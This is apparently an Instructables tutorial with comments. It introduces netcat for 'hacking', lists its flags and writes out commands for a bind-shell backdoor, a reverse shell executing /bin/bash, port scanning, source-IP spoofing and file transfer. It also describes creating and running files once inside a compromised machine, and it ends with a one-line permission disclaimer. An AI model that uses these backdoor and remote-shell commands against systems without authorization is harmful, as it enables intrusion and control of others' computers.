More Fun With Netcat!!




Introduction: More Fun With Netcat!!

Now if you haven't read Duct tape's guide to Netcat Backdoors, then read that, then come here. This Instructable goes over the basic netcat commands and how to use them. It also goes over some basic batch commands as well.

Step 1: Getting Netcat

Now, the first thing I like to have is netcat on my own computer. Don't be afraid to install it. Netcat is not a back door in itself, but can be used to create a back door. Netcat is basically Ms-DOS on steroids, so if you are serious about hacking, you should get netcat.

To get netcat, go to google and search for it, if you are using windows, you should google windows netcat for the .exe

After you have the .exe, take this and place it in your Windows System32 file, so that you can run it from cmd prompt.

After this, you can just type in nc at cmd prompt to use it,

For an example, if you wanted to get into a back door you installed, you would use the command


I will get into more commands in the next step.

Step 2: Basic Netcat Commands

-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)

Connect to a port on
a remote host

nc remote_host <port>

Connect to multiple
ports on a remote host

nc remote_host <port>...<port>
For example:
nc 21 25 80

Listen on a port for
incoming connections
(Also know as A Back Door)

nc -v -l -p <port>

Connect to remote host
and serve a bash shell

nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with

Listen on a port and
serve a bash shell
upon connect

nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with

Port scan a remote

nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -œi <seconds> -v -z remote_host

Pipe command output
to a netcat request

<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
"| nc 80

Use source-routing to
connect to a port on a
remote host

nc -œg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -œG flag to specify the source-routing pointer.

Spoof source IP

Use the -œs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -œs flag can be used along with most of
the commands presented in this table.

Transfer a file

On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
nc -v -l -p <port> > file
And run the following command on the server host:
nc -œv <client_host> <port> < file

These can all be used by your netcat

Step 3: The Bat File Portion

Once your in a Computer or server, you can exploit anything you want, usually i use vbs and .bat files, but I also want to create files through this method, now, you can transfer files by using the commands previously stated, but I like to create the files on the fly. You can google ways to transfer files through MS-DOS, and get many methods. I always like to use the Echo method

once your in, use this command

Echo put file contents here > name.any file type

this will create the file specified in the current directory

Once your in you can run these by the simple command line

start filename

Step 4: Netcat

There are many other things you can do with netcat, but I have not gone into them in this guide.
Please do not use Back Doors on computers you don't won, or where you have no permission.

The Instructables Book Contest

Participated in the
The Instructables Book Contest

Be the First to Share


    • Fabric Challenge

      Fabric Challenge
    • First Time Author Contest

      First Time Author Contest
    • Build a Tool Contest

      Build a Tool Contest



    12 years ago on Introduction

    But who needs netcat when you can just use one of the new adobe zero day and, of course, reverse_tcp connection, because listening connections  are picked and stopped by any firewall and open ports are easily recognized, so instead of you going to them, they come to you instead.

    Put your hand up if you understood anything I just said.


    Reply 12 years ago on Introduction

    SSH is better than netcat, but this instructable was pretty much just a simple introduction to netcat. As to your Adobe Zero Day, I'm sorry to disappoint you, but I don't possess the skills to install and manage a GUI program, I guess I'm just more suited to the command line, for I would rather be able to control everything I do. I'm sorry I cannot match your sudo technological knowhow, but I'm just not root material. Surely a man who merges linux with the apple logo is far superior to me.


    Reply 11 years ago on Introduction

    Funny. I thought you and your ego would be a fair match. The latter seems big enough...

    And hands up, Mr Pyro is correct.